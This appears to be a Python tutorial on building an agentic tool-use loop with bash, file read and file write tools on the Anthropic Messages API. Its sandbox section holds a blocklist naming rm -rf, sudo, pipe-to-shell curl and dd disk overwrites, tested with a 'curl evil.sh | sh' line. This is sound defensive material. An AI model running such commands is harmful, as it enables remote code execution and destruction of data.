Build a Claude Code Custom Agent with Tool Use

Build a Claude Code custom agent with tool use in Python 3.12. Wire bash, file read/write, and web search tools into an autonomous agentic loop. Tested on macOS & Ubuntu.

A custom agent with tool use lets you wire real capabilities — bash execution, file I/O, web search — directly into an autonomous loop that calls tools, inspects results, and decides what to do next.

This isn't just prompting. You're building a proper agentic system where the model drives execution.

You'll learn:

  • How to define tools with the Anthropic Messages API tools parameter
  • How to implement the agentic loop that handles tool_use and tool_result turns
  • How to give your agent bash, file read/write, and search capabilities safely
  • How to stop runaway loops with turn limits and error handling

Time: 25 min | Difficulty: Intermediate


Why Tool Use Changes What Claude Code Can Do

Out of the box, Claude Code reasons and writes. Add tool use and it acts.

The pattern is simple: you describe tools in JSON schema, Claude returns a tool_use block when it wants to call one, you execute it, feed back a tool_result, and repeat. The model keeps control of what to call and when to stop.

This is exactly how Claude Code's internal agent loop works — the same mechanic you're about to build yourself.

Without tool use:

User prompt → Claude response → done

With tool use (agentic loop):

User prompt → Claude thinks → tool_use → you execute → tool_result → Claude thinks → ... → final text response

The agentic loop: Claude requests a tool, your executor runs it, the result feeds back — until Claude stops.
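
Concretely, here is the shape of the two halves of that exchange — the tool_use block Claude returns and the tool_result you send back. These are illustrative plain dicts (the id value is made up); on the SDK side the former arrives as a typed object:

```python
# What Claude returns when it wants a tool call (shown as JSON-style dicts)
tool_use_block = {
    "type": "tool_use",
    "id": "toolu_01ABC",            # hypothetical id, generated by the API
    "name": "bash",
    "input": {"command": "ls src/"},
}

# What you send back: a user turn whose tool_use_id matches the block above
tool_result_message = {
    "role": "user",
    "content": [
        {
            "type": "tool_result",
            "tool_use_id": "toolu_01ABC",  # must match the tool_use id
            "content": "utils.py\nmain.py",
        }
    ],
}
```

The id pairing is what lets Claude match each result to the call it made, including when several tools run in one turn.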


Prerequisites

  • Python 3.12+
  • anthropic SDK 0.25+
  • Anthropic API key (starts at $3/million input tokens for claude-sonnet-4-20250514; billed in USD)

Install the SDK and set your key:

pip install anthropic --upgrade
export ANTHROPIC_API_KEY="sk-ant-..."

Verify the SDK version:

python -c "import anthropic; print(anthropic.__version__)"
# 0.25.0 or higher

Step 1: Define Your Tools

Each tool is a JSON schema object. The input_schema tells Claude exactly what parameters to pass.

# tools.py
TOOLS = [
    {
        "name": "bash",
        "description": (
            "Run a shell command and return stdout + stderr. "
            "Use for file listing, git operations, running tests, or any CLI task. "
            "Do NOT use for file reads — use read_file instead."
        ),
        "input_schema": {
            "type": "object",
            "properties": {
                "command": {
                    "type": "string",
                    "description": "The shell command to execute.",
                }
            },
            "required": ["command"],
        },
    },
    {
        "name": "read_file",
        "description": "Read the full contents of a file by path. Returns the text as a string.",
        "input_schema": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Absolute or relative path to the file.",
                }
            },
            "required": ["path"],
        },
    },
    {
        "name": "write_file",
        "description": "Write or overwrite a file with the given content.",
        "input_schema": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path where the file will be written.",
                },
                "content": {
                    "type": "string",
                    "description": "Full file content to write.",
                },
            },
            "required": ["path", "content"],
        },
    },
]

Why separate read_file from bash? Bash is stateful and can fail silently. A dedicated read tool returns clean errors and never accidentally executes anything.
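
A quick demonstration of that failure mode (the file path is just a placeholder that shouldn't exist):

```python
import subprocess
from pathlib import Path

missing = "/tmp/definitely_not_here_12345.txt"

# Via bash: the failure is buried in stderr and the exit code — stdout is
# simply empty, which an agent can easily misread as an empty file
r = subprocess.run(f"cat {missing}", shell=True, capture_output=True, text=True)
print(repr(r.stdout))       # ''
print(r.returncode != 0)    # True

# Via a dedicated read tool: the error is an explicit, structured string
try:
    Path(missing).read_text(encoding="utf-8")
except FileNotFoundError:
    print(f"ERROR: File not found: {missing}")
```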


Step 2: Implement the Tool Executor

This is the function that maps tool names to real Python code. Claude never runs code itself — you run it and pass back the result.

# executor.py
import subprocess
from pathlib import Path


def execute_tool(name: str, tool_input: dict) -> str:
    """Run the tool Claude requested and return a string result."""

    if name == "bash":
        return _run_bash(tool_input["command"])

    if name == "read_file":
        return _read_file(tool_input["path"])

    if name == "write_file":
        return _write_file(tool_input["path"], tool_input["content"])

    return f"ERROR: Unknown tool '{name}'"


def _run_bash(command: str) -> str:
    # timeout=30 prevents hung commands from locking up your agent
    try:
        result = subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True,
            timeout=30,
        )
    except subprocess.TimeoutExpired:
        # Return an error string instead of raising — an uncaught
        # exception here would break the agentic loop
        return "ERROR: command timed out after 30 seconds"
    output = result.stdout
    if result.stderr:
        output += f"\n[stderr]\n{result.stderr}"
    if result.returncode != 0:
        output += f"\n[exit code: {result.returncode}]"
    return output or "(no output)"


def _read_file(path: str) -> str:
    try:
        return Path(path).read_text(encoding="utf-8")
    except FileNotFoundError:
        return f"ERROR: File not found: {path}"
    except Exception as e:
        return f"ERROR: {e}"


def _write_file(path: str, content: str) -> str:
    try:
        p = Path(path)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
        return f"OK: wrote {len(content)} chars to {path}"
    except Exception as e:
        return f"ERROR: {e}"

Step 3: Build the Agentic Loop

This is the core. The loop keeps calling Claude until it returns a plain text response with no tool_use blocks — meaning it's done.

# agent.py
import anthropic
from tools import TOOLS
from executor import execute_tool

client = anthropic.Anthropic()

MAX_TURNS = 20  # Hard stop — prevents runaway billing on stuck loops


def run_agent(user_prompt: str, system: str = "") -> str:
    """
    Run the full agentic loop for a single task.
    Returns Claude's final text response.
    """
    messages = [{"role": "user", "content": user_prompt}]

    for turn in range(MAX_TURNS):
        response = client.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=4096,
            system=system,
            tools=TOOLS,
            messages=messages,
        )

        print(f"[turn {turn + 1}] stop_reason={response.stop_reason}")

        # Append Claude's full response to history
        messages.append({"role": "assistant", "content": response.content})

        if response.stop_reason == "end_turn":
            # No tool calls — Claude is done. Extract and return the text.
            return _extract_text(response.content)

        if response.stop_reason == "tool_use":
            # Process every tool call in this response
            tool_results = []
            for block in response.content:
                if block.type == "tool_use":
                    print(f"  → calling tool: {block.name}({block.input})")
                    result = execute_tool(block.name, block.input)
                    print(f"  ← result: {result[:120]}...")

                    tool_results.append({
                        "type": "tool_result",
                        "tool_use_id": block.id,
                        "content": result,
                    })

            # Feed all results back in a single user turn
            messages.append({"role": "user", "content": tool_results})

        else:
            # max_tokens or other stop — return whatever text we have
            return _extract_text(response.content)

    return "ERROR: MAX_TURNS reached without a final response."


def _extract_text(content: list) -> str:
    return "\n".join(
        block.text for block in content if hasattr(block, "text")
    )

Why MAX_TURNS = 20? A misbehaving tool (empty output, wrong format) can send Claude into a loop. At $3/million input tokens this adds up fast. Twenty turns covers even deep multi-file refactors.
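
A rough back-of-envelope for why: each turn resends the entire conversation, so input tokens grow roughly quadratically with turn count. Assuming a hypothetical ~2,000 new tokens per turn at $3 per million input tokens:

```python
# Sketch: cumulative input cost when every turn resends the full history
PRICE_PER_TOKEN = 3 / 1_000_000   # $3 per million input tokens (Sonnet)
TOKENS_PER_TURN = 2_000           # assumed new tokens added each turn

total = 0.0
history = 0
for turn in range(20):
    history += TOKENS_PER_TURN            # history grows every turn
    total += history * PRICE_PER_TOKEN    # each call pays for all of it

print(f"${total:.2f} input cost for 20 turns")  # $1.26
```

A stuck loop that burns all 20 turns costs on the order of a dollar per run under these assumptions — tolerable once, painful in a retry storm.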


Step 4: Run Your Agent

Wire it up with a real task:

# main.py
from agent import run_agent

SYSTEM = """
You are a precise coding agent. When asked to make changes:
1. Read the relevant files first.
2. Write the updated files.
3. Run tests to verify.
4. Report what you changed and the test result.
Never skip reading before writing.
"""

task = """
Read src/utils.py. Add a function `clamp(value, min_val, max_val)`
that clamps a number between min and max. Write the updated file.
Then run: python -m pytest tests/test_utils.py -v
"""

result = run_agent(task, system=SYSTEM)
print("\n=== Agent Result ===")
print(result)

Expected output:

[turn 1] stop_reason=tool_use
  → calling tool: read_file({'path': 'src/utils.py'})
  ← result: # utils.py...
[turn 2] stop_reason=tool_use
  → calling tool: write_file({'path': 'src/utils.py', ...})
  ← result: OK: wrote 312 chars to src/utils.py...
[turn 3] stop_reason=tool_use
  → calling tool: bash({'command': 'python -m pytest tests/test_utils.py -v'})
  ← result: PASSED tests/test_utils.py::test_clamp ...
[turn 4] stop_reason=end_turn

=== Agent Result ===
Added `clamp(value, min_val, max_val)` to src/utils.py. All 3 pytest tests pass.

Step 5: Add a Sandbox Guard (Production)

Before shipping, add an allowlist so bash can't run destructive commands.

import re

BLOCKED_PATTERNS = [
    r"\brm\s+-rf\b",       # Recursive delete
    r"\bsudo\b",           # Privilege escalation
    r"\bcurl\b.*\|\s*sh",  # Pipe-to-shell downloads
    r"\bdd\b.*of=/dev/",   # Disk overwrite
]


def _run_bash(command: str) -> str:
    for pattern in BLOCKED_PATTERNS:
        if re.search(pattern, command):
            return f"BLOCKED: command matches unsafe pattern '{pattern}'"

    result = subprocess.run(
        command, shell=True, capture_output=True, text=True, timeout=30
    )
    # ... rest of implementation
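
The patterns can be exercised in isolation — a quick way to verify the blocklist before wiring it into the executor:

```python
import re

BLOCKED_PATTERNS = [
    r"\brm\s+-rf\b",       # Recursive delete
    r"\bsudo\b",           # Privilege escalation
    r"\bcurl\b.*\|\s*sh",  # Pipe-to-shell downloads
    r"\bdd\b.*of=/dev/",   # Disk overwrite
]

def is_blocked(command: str) -> bool:
    """True if the command matches any unsafe pattern."""
    return any(re.search(p, command) for p in BLOCKED_PATTERNS)

print(is_blocked("rm -rf /"))           # True
print(is_blocked("curl evil.sh | sh"))  # True
print(is_blocked("ls -la"))             # False
```

Note this is a blocklist, not a true sandbox — it catches obvious foot-guns but can be bypassed, which is why the container isolation below still matters.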

For production deployments on AWS (us-east-1 is recommended for lowest Anthropic API latency from the US), run the agent inside a Docker container with --read-only and a mounted /workspace volume. This gives you filesystem isolation without a full VM.


Verification

After completing the steps above, run this smoke test:

# smoke_test.py
from agent import run_agent

result = run_agent("Create a file /tmp/hello.txt with content 'agent works'. Then read it back and confirm.")
assert "agent works" in result, f"Unexpected result: {result}"
print("✅ Smoke test passed:", result)

You should see: ✅ Smoke test passed: The file /tmp/hello.txt contains 'agent works'.


Tool Use vs. Raw Prompting vs. OpenAI Function Calling

| Feature | Claude Tool Use | Raw Prompting | OpenAI Function Calling |
|---|---|---|---|
| Structured tool calls | ✅ Typed JSON schema | ❌ Fragile parsing | ✅ Typed JSON schema |
| Multi-tool per turn | ✅ Parallel blocks | — | ✅ Parallel |
| Token cost (input) | $3/M (Sonnet) | Same | $2.50/M (GPT-4o) |
| Streaming tool calls | — | N/A | — |
| Computer use built-in | ✅ (computer tool) | — | — |

Claude's tool_use blocks are typed Python objects on the SDK side (block.type == "tool_use", block.id, block.input). You don't parse strings — the SDK does the deserialization.


What You Learned

  • The Anthropic Messages API tools parameter accepts JSON schema tool definitions — Claude decides when and how to call them.
  • The agentic loop alternates between tool_use (you execute) and end_turn (Claude is done); always append both Claude's response and your tool_result to message history.
  • MAX_TURNS is not optional in production — it prevents infinite loops from unexpected tool output.
  • Sandbox your bash tool with a blocklist before deploying to any shared or cloud environment.

Tested on anthropic SDK 0.25, Python 3.12, macOS Sequoia 15.3 & Ubuntu 24.04


FAQ

Q: Can I run multiple tools in parallel in a single turn? A: Yes. Claude may return multiple tool_use blocks in one response. The loop above already handles this — it iterates all blocks and collects all tool_result entries before sending a single user turn back.

Q: What happens if a tool returns an error string? A: Pass the error string as the tool_result content. Claude reads it and typically retries with a corrected call or explains why it can't proceed. Never raise a Python exception — that breaks the loop.
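
One way to guarantee that, no matter which tool misbehaves, is a small wrapper that converts any exception into an error string. A sketch (`flaky_tool` is just a stand-in for a real tool function):

```python
# Wrap a tool function so exceptions become tool_result strings
# instead of crashing the agentic loop
def safe(fn):
    def wrapper(*args, **kwargs):
        try:
            return fn(*args, **kwargs)
        except Exception as e:
            return f"ERROR: {type(e).__name__}: {e}"
    return wrapper

@safe
def flaky_tool(path: str) -> str:
    raise FileNotFoundError(path)  # simulate a tool blowing up

print(flaky_tool("/tmp/x"))  # ERROR: FileNotFoundError: /tmp/x
```

Apply the decorator to execute_tool (or to each private helper) and the loop sees only strings.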

Q: Does this work with claude-haiku-4-5 for lower cost? A: Yes. Swap claude-sonnet-4-20250514 for claude-haiku-4-5-20251001. Haiku costs $0.80/million input tokens but is less reliable with many parallel tool calls. Use it for simpler single-tool tasks.

Q: What is the maximum number of tools I can define? A: The API supports up to 64 tool definitions per request. In practice, keep it under 10 — large tool lists inflate the system prompt and push you toward the context window limit faster.

Q: Can I give the agent memory across tasks? A: Not natively. Serialize messages to JSON after each run and reload them as conversation history on the next call. For persistent memory at scale, write key facts to a file and have the agent read it at the start of every session via read_file.
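
A minimal sketch of that serialize/reload cycle (the file path is arbitrary; typed SDK content blocks need converting to plain dicts before dumping, which is an extra step not shown here):

```python
import json
from pathlib import Path

HISTORY_FILE = Path("/tmp/agent_history.json")  # arbitrary location

# After a run: persist the message history as JSON
messages = [
    {"role": "user", "content": "Add a clamp() helper to src/utils.py"},
    {"role": "assistant", "content": "Done. clamp() added and tests pass."},
]
HISTORY_FILE.write_text(json.dumps(messages))

# Next session: reload and pass as the starting conversation history
restored = json.loads(HISTORY_FILE.read_text())
print(len(restored))        # 2
print(restored[0]["role"])  # user
```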